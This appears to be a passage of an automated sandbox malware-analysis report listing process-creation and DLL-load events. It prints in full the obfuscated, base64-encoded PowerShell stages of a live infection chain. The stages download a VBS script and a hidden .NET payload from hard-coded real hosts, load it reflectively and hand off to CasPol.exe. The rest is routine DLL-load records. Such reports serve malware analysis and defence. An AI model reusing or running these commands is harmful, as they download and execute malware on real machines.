Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe PoWErsheLl -ex bYPAsS -NoP -w 1 -c DEvIcECREdEnTiAlDEPlOymenT.exE ; iNVoKe-expreSSiON($(INvOKe-eXPRESsiOn('[SySTeM.tExt.EncOdiNg]'+[CHaR]0X3A+[Char]0x3a+'uTF8.gETSTrinG([systEM.conveRT]'+[cHAR]0x3A+[CHAR]58+'frOmBASE64sTRinG('+[ChAr]34+'JDZaMHdNY2diT1g1ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQURELVRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU1FTWJFcmRFRmlOSVRpb04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTE1vTi5EbGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9xaXBUeWZFVyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQkdsVVVFc0ksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBpdFRVeHR6cyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUE1sKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpYkYiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uQU1lc1BBY2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYWJmS1NzU0FEICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJDZaMHdNY2diT1g1OjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjIxMC4xNTAuMjQvNTUvY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtaWNyZWFtLnRJRiIsIiRlTlY6QVBQREFUQVxjcmVhbXlraXNzaW5nbGlwc2dvb2Rmb3JjcmVhbXl0aGluZ3N3aXRoY3JlYW0udmJTIiwwLDApO1N0YVJ0LVNMZWVQKDMpO0ludm9rRS1FWHBSRVNTaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZU5WOkFQUERBVEFcY3JlYW15a2lzc2luZ2xpcHNnb29kZm9yY3JlYW15dGhpbmdzd2l0aGNyZWFtLnZiUyI='+[chAr]34+'))')))"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yy1wu0jg\yy1wu0jg.cmdline"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\creamykissinglipsgoodforcreamythingswithcream.vbS"	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES5305.tmp" "c:\Users\user\AppData\Local\Temp\yy1wu0jg\CSCCF35FBE9A0D8429B84CE9BA7B3CB93B6.TMP"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $isohemolytic = 'JGNhc2VtYXRlZCA9ICdodHRwczovL3Jlcy5jbG91ZGluYXJ5LmNvbS9keXRmbHQ2MW4vaW1hZ2UvdXBsb2FkL3YxNzMzMTM0OTQ3L2JrbHB5c2V5ZXV0NGltcHc1MG4xLmpwZyAnOyRSYWRub3IgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50OyRoZW1pYWJsZXBzaWEgPSAkUmFkbm9yLkRvd25sb2FkRGF0YSgkY2FzZW1hdGVkKTskYmlkZXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkaGVtaWFibGVwc2lhKTska2lkZGllcyA9ICc8PEJBU0U2NF9TVEFSVD4+JzskYXZlbnRhaWxlID0gJzw8QkFTRTY0X0VORD4+Jzskc3RhaW4gPSAkYmlkZXMuSW5kZXhPZigka2lkZGllcyk7JHJlc2h1ZmZsZSA9ICRiaWRlcy5JbmRleE9mKCRhdmVudGFpbGUpOyRzdGFpbiAtZ2UgMCAtYW5kICRyZXNodWZmbGUgLWd0ICRzdGFpbjskc3RhaW4gKz0gJGtpZGRpZXMuTGVuZ3RoOyRzdWJhY3V0ZWx5ID0gJHJlc2h1ZmZsZSAtICRzdGFpbjskYXJ0aHJhbGdpYSA9ICRiaWRlcy5TdWJzdHJpbmcoJHN0YWluLCAkc3ViYWN1dGVseSk7JHVuYWRzb3JiZWQgPSAtam9pbiAoJGFydGhyYWxnaWEuVG9DaGFyQXJyYXkoKSB8IEZvckVhY2gtT2JqZWN0IHsgJF8gfSlbLTEuLi0oJGFydGhyYWxnaWEuTGVuZ3RoKV07JG1pbnRsaWtlID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygkdW5hZHNvcmJlZCk7JG1pbGxpbmVyID0gW1N5c3RlbS5SZWZsZWN0aW9uLkFzc2VtYmx5XTo6TG9hZCgkbWludGxpa2UpOyRwcm9kaWdhbCA9IFtkbmxpYi5JTy5Ib21lXS5HZXRNZXRob2QoJ1ZBSScpOyRwcm9kaWdhbC5JbnZva2UoJG51bGwsIEAoJzAvQXpmOG8vci9lZS5ldHNhcC8vOnNwdHRoJywgJyRoZXRlcm9icmFuY2hpYScsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywgJ0Nhc1BvbCcsICckaGV0ZXJvYnJhbmNoaWEnLCAnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnJGhldGVyb2JyYW5jaGlhJywnMScsJyRoZXRlcm9icmFuY2hpYScpKTs=';$choleate = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($isohemolytic));Invoke-Expression $choleate	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kdscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Section loaded: cryptsp.dll	Jump to behavior
